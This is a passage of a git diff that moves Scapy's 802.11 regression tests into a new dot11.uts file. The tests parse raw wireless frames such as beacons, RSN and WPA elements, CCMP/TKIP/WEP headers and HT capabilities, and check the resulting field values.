\x83\xa7\x9c*:\x01R\xcf\xd6\xc6~\x989\x9a5\xc97\xfa\x10\xe4!uEP\x968\x00*\xd0\xefE\xf8{\x1d(\xcb\xe3IR\\r\xee\x9fU\x14\ty\xe3\xdc\x96@\xf4\x8d\x17\xab\xcc\x98I\x8e\xe16\x9e\xa5+\xe0\xa8{S\x051##\x90:A') -assert Dot11CCMP in pkt - -assert pkt[Dot11CCMP].PN0 == 68 -assert pkt[Dot11CCMP].PN1 == 35 -assert pkt[Dot11CCMP].res0 == 0 -assert pkt[Dot11CCMP].key_id == 2 -assert pkt[Dot11CCMP].ext_iv == 1 -assert pkt[Dot11CCMP].res1 == 0 -assert pkt[Dot11CCMP].PN2 == 68 -assert pkt[Dot11CCMP].PN3 == 35 -assert pkt[Dot11CCMP].PN4 == 0 -assert pkt[Dot11CCMP].PN5 == 160 - -= Dot11 - answers -a = Dot11()/Dot11Auth(seqnum=1) -b = Dot11()/Dot11Auth(seqnum=2) -assert b.answers(a) -assert not a.answers(b) - -assert not (Dot11()/Dot11Ack()).answers(Dot11()) -assert (Dot11()/LLC(dsap=2, ctrl=4)).answers(Dot11()/LLC(dsap=1, ctrl=5)) - -= Dot11Beacon network_stats() - -data = b'\x00\x00\x12\x00.H\x00\x00\x00\x02\x8f\t\xa0\x00\x01\x01\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffDH\xc1\xb7\xf0uDH\xc1\xb7\xf0u\x10\xb7\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x11\x00\x00\x06SSID76\x01\n\x82\x84\x0c\x12\x18$0H`l\x03\x01\x080\x18\x01\x00\x00\x0f\xac\x04\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x0c\x00\x07\tUSI\x01\x18\x00\n\x05\xe7' -pkt = RadioTap(data) -nstats = pkt[Dot11Beacon].network_stats() -nstats -assert nstats == { - 'channel': 8, - 'crypto': {'WPA2/PSK'}, - 'rates': [1.0, 2.0, 6.0, 9.0, 12.0, 18.0, 24.0, 36.0, 48.0, 54.0], - 'ssid': 'SSID76', - 'country': 'US', - 'country_desc_type': 'Indoor' -} - -data = b'\x00\x00\x16\x00\x0f\x00\x00\x00|P\xb1\x82\xae\x86\x05\x00\x00\x02l\t\xa0\x00\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\x02\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00:Q\xb1\x82\xae\x86\x05\x00d\x00\x11\x04\x00\x0cWPA3-Network\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x01\x05\x04\x00\x02\x00\x00*\x01\x042\x040H`l0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x08\xc0\x00;\x02Q\x00\x7f\x08\x04\x00\x00\x00\x00\x00\x00@' -pkt = RadioTap(data) -nstats = pkt[Dot11Beacon].network_stats() -nstats -assert nstats == { - 'ssid': 'WPA3-Network', - 'rates': [1.0, 2.0, 5.5, 11.0, 6.0, 9.0, 12.0, 18.0, 24.0, 36.0, 48.0, 54.0], - 'channel': 1, - 'crypto': {'WPA3/SAE'} -} - - -= Dot11EltCountry dissection - -data = b"\x00\x00&\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\x00R\xa9[#\x00\x00\x00\x00\x10\x18\x85\t\xc0\x00\xc8\x00\x00\x00\xc3\x00\xc7\x01P\x080\x00V\x9cm\xf4\xb1\xe9\xa0\xcf[\xfb%0\xa0\xcf[\xfb%0\xa0R&\x1a@\xc2\x06\x03\x00\x00f\x00!\x14\x00\x1eDisney Convention Center Guest\x01\x07\x12\x98$0H`l\x03\x01\x06\x07\x06US \x01\x0b\x1e\x0b\x05\n\x00\x8a\x8d[ \x01\x03*\x01\x00-\x1a,\x18\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x006\x03*L\x01=\x16\x06\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00F\x05s\xc0\x00\x00\x00\x7f\x06\x00\x10\x00\x04\x01@\x85\x1e\x10\x00\x8f\x00\x0f\x00\xff\x03Y\x001617-AP33-SorcA\x00\n\x00\x00:\x96\x06\x00@\x96\x00\x0b\x00\xdd\x18\x00P\xf2\x02\x01\x01\x80\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x06\x00@\x96\x01\x01\x04\xdd\x05\x00@\x96\x03\x05\xdd\x05\x00@\x96\x0bI\xdd\x05\x00@\x96\x14\x00dZ\x97\xbf" -pkt = RadioTap(data) -assert pkt[Dot11EltCountry].info == b'US \x01\x0b\x1e' -assert len(pkt[Dot11EltCountry].descriptors) == 1 -assert pkt[Dot11EltCountry].descriptors[0].mtp == 30 - -* Country element: padding check -data = hex_bytes('00001a002f48000017cd9f3100000000000c3c144001e000000080000000ffffffffffff461b860bef06461b860bef06909403e0f75b0000000064001105000c4c697665626f782d3232353001088c1218243048606c0301240504020300000728504c202401172801172c01173001173401173801173c011740011764011e68011e6c011e70011e000b05000002ffff46050000000000200100c30502171717002a01002d1aef0117fffffffffeffffffff1f000001000000000018e6e719003d1624050000000000000000000000000000000000000000dd180050f2020101840003a4000027a4000042435e0062322f0030140100000fac040100000fac040100000fac020000bf0cb279c33faaff0000aaff0000c005012a00fcffdd1e002686010300dd00000025040592000601d15b5816830000000000000000dd06002686170000dd0e00268618010101024c1b860bef067f080100080200000040dd3b0050f204104a0001101044000102105700010110470010344331423836f042f546303634433142103c000103103c0001031049000600372a000120') -pkt = RadioTap(data) -assert pkt[Dot11EltCountry].pad == 0 -assert pkt.getlayer(Dot11Elt, ID=11) - -* Country element: Secondary padding check -erp_payload = b'\x1e\x2a\x01\x62' -country_payload = b'\x07\x06\x55\x53\x20\x01\x0b' - -bare_country = Dot11EltCountry(country_payload) -country_nested = Dot11EltCountry(country_payload + erp_payload) - -assert not bare_country.payload -assert country_nested.payload -assert country_nested.payload.ID == 42 - -= RSNCipherSuite -assert bytes(RSNCipherSuite()) == b'\x00\x0f\xac\x04' -rsn = RSNCipherSuite(b'\x00\x0f\xac\x04') -assert rsn.oui == 0x0fac -assert rsn.cipher == 0x04 - -= AKMSuite -assert bytes(AKMSuite()) == b'\x00\x0f\xac\x01' -akm = AKMSuite(b'\x00\x0f\xac\x01') -assert akm.oui == 0x0fac -assert akm.suite == 0x01 - -= PMKIDListPacket -assert bytes(PMKIDListPacket()) == b'\x00\x00' -pmkids = PMKIDListPacket(b'\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11') -assert pmkids.nb_pmkids == 1 -assert len(pmkids.pmkid_list) == 1 -assert pmkids.pmkid_list[0] == b'LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11' - -= Dot11EltRSN -assert bytes(Dot11EltRSN()) == b'0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00' -rsn_ie = Dot11EltRSN(b'0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x01\x00') -assert rsn_ie.group_cipher_suite.cipher == 0x04 -assert rsn_ie.nb_pairwise_cipher_suites == 0x01 -assert rsn_ie.pairwise_cipher_suites[0].cipher == 0x04 -assert rsn_ie.nb_akm_suites == 0x01 -assert rsn_ie.akm_suites[0].suite == 0x01 -assert rsn_ie.pre_auth -assert Dot11Elt in rsn_ie - -pkt = RadioTap(b"\x00\x000\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x00\x00\x00\x00\x0bpin;%\xedN\x10\x0cl\t\xc0\x00\xce\x00\x00\x00\xb2\x00\xbd\x01\xce\x02\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\xec\x17/\x82\x1e)\xec\x17/\x82\x1e)\x10p\x81a\xa1\x08\x00\x00\x00\x00d\x001\x04\x00\rROUTE-821E295\x01\x01\x8c\x03\x01\x01\x05\x04\x00\x02\x00\x00\x07$IL \x01\x01\x14\x02\x01\x14\x03\x01\x14\x04\x01\x14\x05\x01\x14\x06\x01\x14\x07\x01\x14\x08\x01\x14\t\x01\x14\n\x01\x14\x0b\x01\x14;\x12QQRSTstuvwxyz{}~\x7f\x80*\x01\x000\x1a\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x8c\x00\x00\x00\x00\x0f\xac\x06-\x1a\x8d\x01\x1f\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x81\x00\x03\xa4\x00\x00'\xa4\x00\x00BT^\x00a2/\x00\x7f\x01\x04\xdd\x07\x00\xa0\xc6\x02\x02\x03\x00\xdd\x17\xec\x17/RRRRRRRRRRRRRRRRRRRRR\x9e[\xf2") -assert Dot11EltRSN in pkt -pkt[Dot11Beacon].network_stats() -assert pkt[Dot11Beacon].network_stats() == { - 'ssid': 'ROUTE-821E295', - 'rates': [6.0], - 'channel': 1, - 'country': 'IL', - 'country_desc_type': None, - 'crypto': {'WPA2/PSK'} -} -assert [x.ID for x in pkt[Dot11Elt].iterpayloads()] == [0, 1, 3, 5, 7, 59, 42, 48, 45, 61, 221, 127, 221, 221] -assert pkt.pmkids.nb_pmkids == 0 -assert pkt.group_management_cipher_suite.oui == 0xfac -assert pkt.group_management_cipher_suite.cipher == 0x6 - -= Dot11EltMicrosoftWPA -assert bytes(Dot11EltMicrosoftWPA()) == b'\xdd\x16\x00P\xf2\x01\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01' -ms_wpa_ie = Dot11EltMicrosoftWPA(b'\xdd\x1a\x00P\xf2\x01\x01\x00\x00P\xf2\x02\x02\x00\x00P\xf2\x04\x00P\xf2\x02\x01\x00\x00P\xf2\x01') -assert ms_wpa_ie[Dot11EltMicrosoftWPA].type == 0x01 -assert ms_wpa_ie[Dot11EltMicrosoftWPA].version == 0x01 -assert ms_wpa_ie[Dot11EltMicrosoftWPA].group_cipher_suite.cipher == 0x02 -assert ms_wpa_ie[Dot11EltMicrosoftWPA].nb_pairwise_cipher_suites == 0x02 -assert ms_wpa_ie[Dot11EltMicrosoftWPA].pairwise_cipher_suites[0].cipher == 0x04 -assert ms_wpa_ie[Dot11EltMicrosoftWPA].pairwise_cipher_suites[1].cipher == 0x02 -assert ms_wpa_ie[Dot11EltMicrosoftWPA].nb_akm_suites == 0x01 -assert ms_wpa_ie[Dot11EltMicrosoftWPA].akm_suites[0].suite == 0x01 -assert Dot11Elt in ms_wpa_ie - -= Dot11EltVendorSpecific -assert bytes(Dot11EltVendorSpecific()) == b'\xdd\x03\x00\x00\x00' -vendor_specific_ie = Dot11EltVendorSpecific(b'\xdd\t\x00\x03\x7f\x01\x01\x00\x00\xff\x7f') -assert vendor_specific_ie.oui == 0x00037f -assert Dot11Elt in vendor_specific_ie - -= Beacon with RSN IE -f = Dot11(b"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffLN5V\xee\x03LN5V\xee\x03\xf0\x8f\x80\x01\xdc7\x00\x00\x00\x00\x90\x011\x04\x00\x0cciscosb-wpa2\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x06\x05\x04\x00\x01\x00\x00*\x01\x000\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x01\x002\x040H`l\xdd\x18\x00P\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x1e\x00\x90L3L\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1aL\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x1a\x00\x90L4\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x0e\x14\x00\n\x00,\x01\xc8\x00\x14\x00\x05\x00\x19\x00\x7f\x01\x01\xdd\t\x00\x03\x7f\x01\x01\x00\x00\xff\x7f\xdd\n\x00\x03\x7f\x04\x01\x00\x06\x00@\x00") -assert Dot11EltRSN in f -assert f[Dot11EltRSN].len == 20 -assert f[Dot11EltRSN].group_cipher_suite[0].cipher == 0x04 -assert f[Dot11EltRSN].pairwise_cipher_suites[0].cipher == 0x04 -assert f[Dot11EltRSN].akm_suites[0].suite == 0x01 - -= Beacon with Microsoft WPA IE -f = Dot11(b"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffNN5V\xee\x03NN5V\xee\x030\x8f\x80\x01\xdc7\x00\x00\x00\x00\x90\x011\x04\x00\x0bciscosb-wpa\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x06\x05\x04\x00\x01\x00\x00*\x01\x00\xdd\x16\x00P\xf2\x01\x01\x00\x00P\xf2\x04\x01\x00\x00P\xf2\x04\x01\x00\x00P\xf2\x012\x040H`l\xdd\x18\x00P\xf2\x02\x01\x01\x85\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x1e\x00\x90L3L\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1aL\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x1a\x00\x90L4\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x0e\x14\x00\n\x00,\x01\xc8\x00\x14\x00\x05\x00\x19\x00\x7f\x01\x01\xdd\t\x00\x03\x7f\x01\x01\x00\x00\xff\x7f\xdd\n\x00\x03\x7f\x04\x01\x00\x06\x00@\x00") -assert Dot11EltMicrosoftWPA in f -assert f[Dot11EltMicrosoftWPA].type == 0x01 -assert f[Dot11EltMicrosoftWPA].version == 0x01 -assert f[Dot11EltMicrosoftWPA].group_cipher_suite.cipher == 0x04 -assert f[Dot11EltMicrosoftWPA].nb_pairwise_cipher_suites == 0x01 -assert f[Dot11EltMicrosoftWPA].pairwise_cipher_suites[0].cipher == 0x04 -assert f[Dot11EltMicrosoftWPA].nb_akm_suites == 0x01 -assert f[Dot11EltMicrosoftWPA].akm_suites[0].suite == 0x01 - -= HT Capabilities -f = RadioTap(b"\x00\x00&\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x9dt\xc3\xf1\x18\x00\x00\x00\x10\x02l\t\xa0\x00\xd9\x00\x00\x00\xd3\x00\xd7\x01@\x00\x00\x00\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa\xff\xff\xff\xff\xff\xffP'\x00\x00\x01\x04\x02\x04\x0b\x162\x08\x0c\x12\x18$0H`l\x03\x01\x01-\x1a-@\x17\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x00\x00\x08\x04\x00\x00\x00@Y\xb7T\x13") -assert Dot11EltHTCapabilities in f -assert f.L_SIG_TXOP_Protection == 0 -assert f.Forty_Mhz_Intolerant == 1 -assert f.PSMP == 0 -assert f.DSSS_CCK == 0 -assert f.Max_A_MSDU == 0 -assert f.Delayed_BlockAck == 0 -assert f.Rx_STBC == 0 -assert f.Tx_STBC == 0 -assert f.Short_GI_40Mhz == 0 -assert f.Short_GI_20Mhz == 1 -assert f.Green_Field == 0 -assert f.SM_Power_Save == 3 -assert f.Supported_Channel_Width == 0 -assert f.LDPC_Coding_Capability == 1 -assert f.res1 == 0 -assert f.Min_MPDCU_Start_Spacing == 5 -assert f.Max_A_MPDU_Length_Exponent == 3 -assert f.TX_Unequal_Modulation == 0 -assert f.TX_Max_Spatial_Streams == 0 -assert f.TX_RX_MCS_Set_Not_Equal == 0 -assert f.TX_MCS_Set_Defined == 0 -assert f.RX_Highest_Supported_Data_Rate == 0 -assert f.RX_MSC_Bitmask == 255 -assert f.RD_Responder == 0 -assert f.HTC_HT_Support == 0 -assert f.MCS_Feedback == 0 -assert f.PCO_Transition_Time == 0 -assert f.PCO == 0 -assert f.Channel_Estimation_Capability == 0 -assert f.CSI_max_n_Rows_Beamformer_Supported == 0 -assert f.Compressed_Steering_n_Beamformer_Antennas_Supported == 0 -assert f.Noncompressed_Steering_n_Beamformer_Antennas_Supported == 0 -assert f.CSI_n_Beamformer_Antennas_Supported == 0 -assert f.Minimal_Grouping == 0 -assert f.Explicit_Compressed_Beamforming_Feedback == 0 -assert f.Explicit_Noncompressed_Beamforming_Feedback == 0 -assert f.Explicit_Transmit_Beamforming_CSI_Feedback == 0 -assert f.Explicit_Compressed_Steering == 0 -assert f.Explicit_Noncompressed_Steering == 0 -assert f.Explicit_CSI_Transmit_Beamforming == 0 -assert f.Calibration == 0 -assert f.Implicit_Trasmit_Beamforming == 0 -assert f.Transmit_NDP == 0 -assert f.Receive_NDP == 0 -assert f.Transmit_Staggered_Sounding == 0 -assert f.Receive_Staggered_Sounding == 0 -assert f.Implicit_Transmit_Beamforming_Receiving == 0 -assert f.ASEL == 0 - -= HT Capabilities with fuzzed values -# Those were checked with Wireshark ! -f = RadioTap(b'\x00\x00\t\x00\x02\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1a\xecH\xbf\x85!\x02\xd0m\x91\xa8\xd9\xf0\xa9\xb8\x15\xae\x00\x00\x00,Y\x86\xb3H\xa7?Z\xd2\xa8\xc2') -assert Dot11EltHTCapabilities in f -assert f.L_SIG_TXOP_Protection == 0 -assert f.Forty_Mhz_Intolerant == 1 -assert f.PSMP == 0 -assert f.DSSS_CCK == 0 -assert f.Max_A_MSDU == 1 -assert f.Delayed_BlockAck == 0 -assert f.Rx_STBC == 0 -assert f.Tx_STBC == 1 -assert f.Short_GI_40Mhz == 1 -assert f.Short_GI_20Mhz == 1 -assert f.Green_Field == 0 -assert f.SM_Power_Save == 3 -assert f.Supported_Channel_Width == 0 -assert f.LDPC_Coding_Capability == 0 -assert f.res1 == 5 -assert f.Min_MPDCU_Start_Spacing == 7 -assert f.Max_A_MPDU_Length_Exponent == 3 -assert f.TX_Unequal_Modulation == 0 -assert f.TX_Max_Spatial_Streams == 3 -assert f.TX_RX_MCS_Set_Not_Equal == 1 -assert f.TX_MCS_Set_Defined == 0 -assert f.RX_Highest_Supported_Data_Rate == 440 -assert f.RX_MSC_Bitmask == 46944200869120244326789 -assert f.RD_Responder == 1 -assert f.HTC_HT_Support == 0 -assert f.MCS_Feedback == 1 -assert f.PCO_Transition_Time == 2 -assert f.PCO == 0 -assert f.Channel_Estimation_Capability == 0 -assert f.CSI_max_n_Rows_Beamformer_Supported == 3 -assert f.Compressed_Steering_n_Beamformer_Antennas_Supported == 2 -assert f.Noncompressed_Steering_n_Beamformer_Antennas_Supported == 2 -assert f.CSI_n_Beamformer_Antennas_Supported == 1 -assert f.Minimal_Grouping == 0 -assert f.Explicit_Compressed_Beamforming_Feedback == 1 -assert f.Explicit_Noncompressed_Beamforming_Feedback == 1 -assert f.Explicit_Transmit_Beamforming_CSI_Feedback == 2 -assert f.Explicit_Compressed_Steering == 0 -assert f.Explicit_Noncompressed_Steering == 1 -assert f.Explicit_CSI_Transmit_Beamforming == 1 -assert f.Calibration == 2 -assert f.Implicit_Trasmit_Beamforming == 0 -assert f.Transmit_NDP == 0 -assert f.Receive_NDP == 0 -assert f.Transmit_Staggered_Sounding == 1 -assert f.Receive_Staggered_Sounding == 1 -assert f.Implicit_Transmit_Beamforming_Receiving == 0 -assert f.ASEL.resTransmit_Sounding_PPDUs -assert f.ASEL.Receive_ASEL -assert f.ASEL.Antenna_Indices_Feedback -assert f.ASEL.Explicit_CSI_Feedback -assert f.ASEL.Explicit_CSI_Feedback_Based_Transmit_ASEL -assert f.ASEL.Antenna_Selection -assert f.ASEL == 63 - -= RadioTap - MCS weird padding -f = RadioTap(b'\x00\x00,\x00K\x08\x1c\x00"b\x96\x03\x00\x00\x00\x00\x10\x00l\t\x80\x04\xb0\x00\x80\x04\x01\x00l\t\x01\x00\x1f\x08\x0c\x00\x94\x05\x00\x00\x04\x00\x00\x00\x88\x020\x00.\xdf\xc4J\xb0\xdc\xa0c\x91sf\xech\x05\xca?\xf4h@Y\x00\x00\xaa\xaa\x03\x00\x00\x00\x08\x00E\x00\x05\xdc \xcf@\x00\x80\x06P\xf0\xc0\xa8\x01\n\xc0\xa8\x01\x02\xdb\x8f\x13\x89\xfbv\xa3\xde\xf6\xd8L\xe8P\x10\xff\xfft\xdd\x00\x0023456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901O\xdc\x01x') -assert f.knownMCS == 31 -assert f.Ness_LSB == 0 -assert f.STBC_streams == 0 -assert f.FEC_type == 0 -assert f.HT_format == 1 -assert f.guard_interval == 0 -assert f.MCS_bandwidth == 0 -assert f.MCS_index == 0xc -assert f.A_MPDU_ref == 1428 - -= Reassociation request -f = Dot11(b' \x00:\x01@\xe3\xd6\x7f*\x00\x00\x10\x18\xa9l.@\xe3\xd6\x7f*\x00 \t1\x04\n\x00@\xe3\xd6\x7f*\x00\x00\x064.2.12\x01\x08\x82\x84\x0b\x16$0Hl!\x02\x08\x1a$\x02\x01\x0b0&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x112\x04\x0c\x12\x18`\x7f\x08\x01\x00\x00\x00\x00\x00\x00@\xdd\t\x00\x10\x18\x02\x00\x00\x10\x00\x00') -assert Dot11EltRSN in f -assert f[Dot11EltRSN].pmkids.nb_pmkids == 1 -assert len(f[Dot11EltRSN].pmkids.pmkid_list) == 1 -assert f[Dot11EltRSN].pmkids.pmkid_list[0] == b'LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11' - -= Backward compatibility of Dot11Elt - -# Old naming scheme -assert Dot11Elt(ID="DSset").sprintf("%ID%") == 'DSSS Set' -assert Dot11Elt(ID="RSNinfo").sprintf("%ID%") == 'RSN' - ###################################### # More PPI tests in contrib/ppi_cace # diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts new file mode 100644 index 00000000000..48e639ead08 --- /dev/null +++ b/test/scapy/layers/dot11.uts @@ -0,0 +1,563 @@ +% Dot11 regression tests for Scapy + +############ +############ ++ 802.11 +~ dot11 + += 802.11 - misc +PrismHeader().answers(PrismHeader()) == True + +dpl = Dot11PacketList([Dot11()/LLC()/SNAP()/IP()/UDP()]) +len(dpl) == 1 + +dpl_ether = dpl.toEthernet() +len(dpl_ether) == 1 and Ether in dpl_ether[0] + += Dot11 - build +s = raw(Dot11()) +s == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += Dot11 - dissection +p = Dot11(s) +Dot11 in p and p.addr3 == "00:00:00:00:00:00" +assert p.mysummary() == '802.11 Management Association Request 00:00:00:00:00:00 (TA=SA) > 00:00:00:00:00:00 (RA=DA)' +assert "DA" in p.address_meaning(1) +assert "SA" in p.address_meaning(2) +assert "BSSID" in p.address_meaning(3) + += Dot11QoS - build +s = raw(Dot11()/Dot11QoS(Ack_Policy=1)) +assert s == b'\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00' + +s = raw(Dot11(type=2, subtype=8)/Dot11QoS(TID=4)) +assert s == b'\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00' + += Dot11 - binary in SSID +pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID=0, info=b"".join(chb(i) for i in range(32))) +pkt.show() +pkt.summary() +assert pkt[Dot11Elt::{"ID": 0}].summary() in [ + "SSID='%s'" % "".join(repr(chr(d))[1:-1] for d in range(32)), + 'SSID="%s"' % "".join(repr(chr(d))[1:-1] for d in range(32)), +] +pkt = Dot11(raw(pkt)) +pkt.show() +pkt.summary() +assert pkt[Dot11Elt::{"ID": 0}].summary() in [ + "SSID='%s'" % "".join(repr(chr(d))[1:-1] for d in range(32)), + 'SSID="%s"' % "".join(repr(chr(d))[1:-1] for d in range(32)), +] + += Dot11QoS - dissection +p = Dot11(s) +assert Dot11QoS in p +assert p.TID == 4 +assert "DA" in p.address_meaning(1) +assert "SA" in p.address_meaning(2) +assert "BSSID" in p.address_meaning(3) + += Dot11 - answers +query = Dot11(type=0, subtype=0) +Dot11(type=0, subtype=1).answers(query) == True + += Dot11 - misc +assert Dot11Elt(info="scapy").summary() == "SSID='scapy'" +assert Dot11Elt(ID=1).mysummary() == "" +assert Dot11(b'\x84\x00\x00\x00\x00\x11\x22\x33\x44\x55\x00\x11\x22\x33\x44\x55').addr2 == '00:11:22:33:44:55' + += Multiple Dot11Elt layers +pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID="Supported Rates") / Dot11Elt(ID="SSID", info="Scapy") +assert pkt[Dot11Elt::{"ID": 0}].info == b"Scapy" +assert pkt.getlayer(Dot11Elt, ID=0).info == b"Scapy" + += Dot11WEP - build +~ crypto +conf.wepkey = "" +assert raw(PPI()/Dot11(FCfield=0x40)/Dot11WEP()) == b'\x00\x00\x08\x00i\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +conf.wepkey = "test123" +assert raw(PPI()/Dot11(type=2, subtype=8, FCfield=0x40)/Dot11QoS()/Dot11WEP()) == b'\x00\x00\x08\x00i\x00\x00\x00\x88@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008(^a' + += Dot11WEP - dissect +~ crypto +conf.wepkey = "test123" +a = PPI(b'\x00\x00\x08\x00i\x00\x00\x00\x88@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008(^a') +assert a[Dot11QoS][Dot11WEP].icv == 942169697 + += Dot11TKIP - dissection + +pkt = RadioTap(b'\x00\x00\x0f\x00*\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x08B\x00\x00\xff\xff\xff\xff\xff\xff\xfe\xec\xda\x1d\xa3M\x00\x04t\x14\x02BP+\x01!\x00\xa0\x01!\x00\xa0\x01!\x00\xa0\x00\x00\x00\x00\xb0\xb6sN\xbdl9S\xc3x\x9d\xa6TEp\xcd(\xebht{\xff9\x9a[\x0f~\x00\xf8&m$\x1e\xd2[dXn\x16\x8526G\x8c\x88\xc3B\xc9\xda^\xc5w\xa5 \x9a\xa0 \x08') +assert Dot11TKIP in pkt + +assert pkt[Dot11TKIP].TSC1 == 1 +assert pkt[Dot11TKIP].WEPSeed == 33 +assert pkt[Dot11TKIP].TSC0 == 0 +assert pkt[Dot11TKIP].key_id == 2 +assert pkt[Dot11TKIP].ext_iv == 1 +assert pkt[Dot11TKIP].res == 0 +assert pkt[Dot11TKIP].TSC2 == 1 +assert pkt[Dot11TKIP].TSC3 == 33 +assert pkt[Dot11TKIP].TSC4 == 0 +assert pkt[Dot11TKIP].TSC5 == 160 + +assert "DA" in pkt[Dot11].address_meaning(1) +assert "TA=BSSID" in pkt[Dot11].address_meaning(2) +assert "SA" in pkt[Dot11].address_meaning(3) + += Dot11CCMP - dissection + +pkt = 